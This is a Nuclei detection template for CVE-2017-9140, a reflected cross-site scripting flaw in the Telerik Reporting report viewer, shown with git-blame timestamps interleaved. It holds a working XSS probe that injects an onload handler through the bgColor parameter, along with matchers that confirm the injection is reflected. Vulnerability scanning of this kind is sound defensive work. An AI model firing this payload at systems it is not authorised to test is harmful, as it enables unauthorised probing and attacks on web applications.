nuclei-templates/cves/2017/CVE-2017-9140.yaml

37 lines
1.2 KiB
YAML
Raw Normal View History

2021-06-09 13:10:47 +00:00
id: CVE-2017-9140
info:
2021-06-09 16:07:22 +00:00
name: Reflected XSS - Telerik Reporting Module
2021-06-09 13:10:47 +00:00
author: dhiyaneshDk
severity: medium
description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
reference:
- https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
- https://nvd.nist.gov/vuln/detail/CVE-2017-9140
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-9140
cwe-id: CWE-79
remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
tags: cve,cve2017,xss,telerik
2021-06-09 13:10:47 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'
2021-06-09 16:07:22 +00:00
matchers-condition: and
2021-06-09 13:10:47 +00:00
matchers:
2021-06-09 16:07:22 +00:00
- type: status
status:
- 200
2021-06-09 13:10:47 +00:00
- type: word
words:
2021-06-09 16:07:22 +00:00
- '#000000"onload="prompt(1)'
- 'Telerik.ReportViewer.axd?name=Resources'
2021-06-09 13:10:47 +00:00
condition: and
# Enhanced by cs on 2022/02/28